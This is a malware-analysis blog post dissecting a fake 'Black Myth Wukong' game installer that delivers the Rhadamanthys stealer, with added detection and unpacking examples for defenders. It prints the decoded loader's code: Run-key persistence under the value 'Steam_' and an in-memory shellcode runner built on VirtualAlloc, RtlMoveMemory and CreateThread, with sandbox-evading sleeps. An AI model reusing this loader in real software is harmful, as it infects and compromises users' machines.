CTI Analyst at @ActiveFence
Forensic at @World Wide Flags
Operator at @Cookie Han Hoan

Malware Analysis - Real Case 8

Hi guys, I’ve just had a very bad day today… I don’t wanna talk about it again because it makes me feel kinda vulnerable… Anyway, to forget all of today’s sad stories I analysed a sample that has been around for a long time. Ok let’s go… (you can grab the sample here)

First of all, this is the malware that infected Mixi’s machine, and this post is just for education; I will not take any responsibility for your illegal actions!

Now on to the main part. I downloaded it and it’s a .rar file, so just unrar it to get all the files inside:

image

We can see that Black Myth Wukong 64-bit.exe is the main component of this malware, so let’s analyse it. I used diec to detect the packing method, and it was packed with PyInstaller:

image

From here we can use pyinstxtractor-ng to dump all components inside the exe file:

image

You can see that BSR.pyc is the most suspicious file here, and to decompile a .pyc file we would normally use uncompyle6 or pycdc. But when I tried, it didn’t work, even though I used pyinstxtractor-ng, which is the best extractor so far:

image

From here I guessed there was something I needed to check, hmmmm, kinda interesting huh? The tools we use can have their own problems, and in this case the extractor didn’t produce a complete dump because it can only handle files up to a permitted size. So I guessed that the authors used the PE bloat technique: junk bytes are appended to the end of the file so that the file size grows past what AV engines, and our tools, will scan. The easiest check is to use xxd and look at the end of the file, and as I expected, there are lots of junk bytes there:

image

There is a tool to help you remove all the junk bytes from the exe file. I used it, and surprisingly the sample shrank from 660 MB to 6.61 MB!:

image
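To show the check and the cleanup that the two paragraphs above describe, here is an added example of my own (it is not the tool the author used and not code from the post): it parses the PE section table to find where the real section data ends, measures the run of one repeated byte at the tail of the file, and trims that run while refusing to cut into the section data. The sample PE is constructed in `build_sample()` and is not the real sample; its placeholder overlay stands in for the PyInstaller archive, which lives after the last section and must survive the trim.

```python
import struct
from typing import Dict, Optional, Tuple


def pe_section_end(data: bytes) -> Optional[int]:
    """File offset where the last section's raw data ends, or None if not a PE.
    Everything after this offset is overlay (PyInstaller keeps its archive there)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    try:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
        opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
        table = e_lfanew + 24 + opt_size
        end = table + 40 * num_sections  # the headers themselves count as content
        for i in range(num_sections):
            # SizeOfRawData sits at +16 and PointerToRawData at +20 of each 40-byte entry
            size_raw, ptr_raw = struct.unpack_from("<II", data, table + 40 * i + 16)
            end = max(end, ptr_raw + size_raw)
        return end
    except struct.error:
        return None  # truncated header: treat as "not a PE we can reason about"


def trailing_run(data: bytes) -> Tuple[int, int]:
    """Length of the run of a single repeated byte at the end of data, and that byte's value."""
    if not data:
        return 0, -1
    last = data[-1]
    return len(data) - len(data.rstrip(bytes([last]))), last


def strip_bloat(data: bytes, min_run: int = 1024) -> Tuple[bytes, Dict[str, int]]:
    """Drop a trailing run of one repeated byte if it is at least min_run bytes long,
    never cutting into the section data described by the PE header."""
    run, value = trailing_run(data)
    section_end = pe_section_end(data)
    keep = len(data)
    if run >= min_run:
        keep = len(data) - run
        if section_end is not None:
            keep = max(keep, section_end)
    report = {
        "original_size": len(data),
        "trailing_run": run,
        "trailing_byte": value,
        "section_end": section_end if section_end is not None else -1,
        "trimmed_size": keep,
    }
    return data[:keep], report


def build_sample() -> bytes:
    """Constructed stand-in for a bloated PyInstaller exe: minimal PE + fake overlay + junk."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    # COFF header: x64 machine, 1 section, no optional header (enough for this parser)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x22)
    # One section of 0x200 raw bytes at file offset 0x200
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    header = (bytes(dos) + b"PE\0\0" + coff + sect).ljust(0x200, b"\0")
    section = bytes(range(256)) * 2                      # made-up section data
    overlay = b"MEI-ARCHIVE-PLACEHOLDER" * 10            # stands in for the appended archive
    junk = b"\0" * 5000                                  # the "PE bloat" tail
    return header + section + overlay + junk


if __name__ == "__main__":
    cleaned, report = strip_bloat(build_sample())
    print(report)  # trailing_run 5000, section_end 1024, trimmed_size 1254
```

For a real file, read it into bytes and call `strip_bloat()` on it, then write the result out and re-run the extractor. The single-byte run test catches the common null or single-value padding; bloat made of random data or a repeated multi-byte pattern will not register, so in that case compare the reported `section_end` and overlay size against what xxd shows, as the author did.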

Now redo everything we did before with the reduced file. I still could not fully decompile BSR.pyc, so from here there is only one way left: read its bytecode… But I don’t have the heart to do that today, so I used AI to rewrite the function for me, and this is the final result:

# The obfuscated blob dumped from BSR.pyc: a long string of '1' characters and
# 'TTT' tokens, where every 'TTT' stands for a '0' bit. Path is the one on my machine.
with open("C:\\Users\\Admin\\Documents\\Code\\Python\\payload.txt", "r") as Data:
    payload = Data.read()

def B(bits, encoding):
    # Interpret the whole bit string as one big integer, then render it as big-endian bytes.
    n = int(bits, 2)
    byte_length = (n.bit_length() + 7) // 8
    byte_data = n.to_bytes(byte_length, 'big')
    return byte_data.decode(encoding)

modified_data = payload.replace('TTT', '0')   # restore the zero bits
final_result = B(modified_data, 'utf-8')      # the next-stage Python source

# Write the decoded stage to disk so it can be read (append mode, as in the original script)
with open("payload.py", 'a') as file:
    file.write(final_result)

Run it and you will get another payload:

image

def Checker():
    REG_PATH = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    try:
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_READ)
        value, regtype = winreg.QueryValueEx(registry_key, "Steam_")
        winreg.CloseKey(registry_key)
        return True
            #return value
    except WindowsError:
        return False
            #return None
def P():
    Final_Location = os.path.dirname(sys.argv[0]).replace("/", "\\") + "\\" + os.path.basename(sys.argv[0])
    try:
        subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v {} /t REG_SZ /d "'.format("Steam_") + Final_Location + '"', shell=True)
    except:
        pass
def main():
    try:
        ELES = ctypes.windll.kernel32
        ELES.VirtualAlloc.argtypes = (CHead.LPVOID, ctypes.c_size_t, CHead.DWORD, CHead.DWORD)
        ELES.VirtualAlloc.restype = CHead.LPVOID
        time.sleep(69)
        time.sleep(13)
        ELES.CreateRemoteThread.argtypes = (CHead.HANDLE, CHead.LPVOID, ctypes.c_size_t, CHead.LPVOID, CHead.LPVOID, CHead.DWORD, CHead.LPVOID)
        ELES.CreateThread.restype = CHead.HANDLE
        time.sleep(13)
        ELES.RtlMoveMemory.argtypes = (CHead.LPVOID, CHead.LPVOID, ctypes.c_size_t)
        ELES.RtlMoveMemory.restype = CHead.LPVOID
        time.sleep(13)
        ELES.WaitForSingleObject.argtypes = (CHead.HANDLE, CHead.DWORD)
        ELES.WaitForSingleObject.restype = CHead.DWORD
        #memoryaddr = kernel32.VirtualAlloc(None, len(buf), 0x3000, 0x40)
        time.sleep(69)
        MAS = ELES.VirtualAlloc(None, len(base64.b64decode(SHSH.encode())), 0x3000, 0x40)
        time.sleep(13)
        # kernel32.RtlMoveMemory(memoryaddr, buf, len(buf))
        ELES.RtlMoveMemory(MAS, base64.b64decode(SHSH.encode()),len(base64.b64decode(SHSH.encode())))
        time.sleep(47)
        thrd2 = ELES.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_void_p(MAS), ctypes.c_int(0),ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
        time.sleep(69)
        ELES.WaitForSingleObject(thrd2, -1)
    except Exception as error:
        pass
if __name__ == "__main__":
    #P()
    #f=open("Base64DInvokePAMSI_ETW_ShellCode.txt","w")
    #f.write(base64.b64encode(buf).decode())
    time.sleep(27)
    #if(not Checker()):
        #P()
    #print("Done")
    time.sleep(13)
    time.sleep(13)
    main()

These are the main functions of the payload. The script sets itself to run automatically at startup by adding an entry to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key (value name Steam_, written with reg add; in this dump the calls to Checker() and P() are commented out in the entry point, but the functions are still there). It then uses ctypes to call Windows API functions: allocating memory with VirtualAlloc, copying the base64-decoded shellcode into it with RtlMoveMemory, and executing it in a new thread with CreateThread. The many time.sleep() calls are delays meant to evade sandboxes and detection, and the payload executes in memory without ever being written to disk. From here I took the base64 string, decoded it and got the shellcode:

image
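As a defender’s counterpart to the persistence mechanism described above, here is an added example of my own (not code from the sample or the post): a small detection routine run over constructed Sysmon Event ID 13 (registry value set) records. It flags a Run or RunOnce value when the target path sits in a user-writable location and the value was written by a shell utility such as reg.exe, which is exactly the footprint the payload’s `reg add ... /v Steam_` call would leave. The SID, the paths and the two benign events are made up for the example.

```python
import json
import re
from typing import Dict, List

# Constructed Sysmon Event ID 13 records (newline-delimited JSON). The first mimics
# the payload's "reg add ... /v Steam_" write; the other two are benign noise.
SAMPLE_EVENTS = r"""
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Steam_", "Details": "C:\\Users\\Admin\\Downloads\\Black Myth Wukong 64-bit.exe"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveSetup.exe", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\LastUsedUsername", "Details": "Admin"}
"""

# Run / RunOnce keys under any hive; group 1 is the value name.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.IGNORECASE)
# Locations an unprivileged user can write to.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\|\\Temp\\|\\ProgramData\\|%(?:temp|appdata|localappdata)%", re.IGNORECASE)
# Installers normally write their own Run entries; a shell utility doing it is worth a look.
SCRIPTED_WRITERS = {"reg.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                    "wscript.exe", "cscript.exe", "mshta.exe"}


def evaluate(event: Dict) -> Dict:
    """Score one Sysmon event; returns {} for events that are not Run-key value writes."""
    if event.get("EventID") != 13 or event.get("EventType") != "SetValue":
        return {}
    match = RUN_KEY_RE.search(event.get("TargetObject", ""))
    if not match:
        return {}
    details = event.get("Details", "")
    reasons: List[str] = []
    if USER_WRITABLE_RE.search(details):
        reasons.append("user_writable_path")
    writer = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if writer in SCRIPTED_WRITERS:
        reasons.append("written_by_" + writer)
    # Two independent signals are required to alert; one alone is common for legitimate software.
    return {"value_name": match.group(1), "details": details, "writer": writer,
            "reasons": reasons, "alert": len(reasons) >= 2}


def scan(jsonl: str) -> List[Dict]:
    """Run evaluate() over newline-delimited JSON events and return only the alerts."""
    alerts = []
    for line in jsonl.strip().splitlines():
        result = evaluate(json.loads(line))
        if result.get("alert"):
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"ALERT Run\\{a['value_name']} -> {a['details']} "
              f"(by {a['writer']}; {', '.join(a['reasons'])})")
```

Only the Steam_ entry alerts: the OneDrive write also points into the user profile but comes from the product’s own installer, so it scores one signal and is left for triage rather than raised. The same two signals map directly onto a Sigma rule over Sysmon registry events if you want to ship it to a SIEM.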

Checking the shellcode, it turns out to be a PE32 file:

image

From here I used any.run to run this shellcode and got some results:

image

The shellcode tried to connect to the IP address 94[.]156[.]8[.]129, and when I searched for it on VirusTotal, it was flagged as a C2 address of the Rhadamanthys malware. Moreover, we can see that dialer.exe was marked as malicious even though it lives in System32? From here I guessed that the shellcode injects into the dialer.exe process, and from that process the attacker can do some evil things.

Ok so this is the end now. I can only analyse this far because of my limited knowledge. It’s time for me to find some peaceful place for healing; so many bad things happened to me this morning. Thank you everyone for loving me and giving me the chance to show myself. Finally, I love you so much…
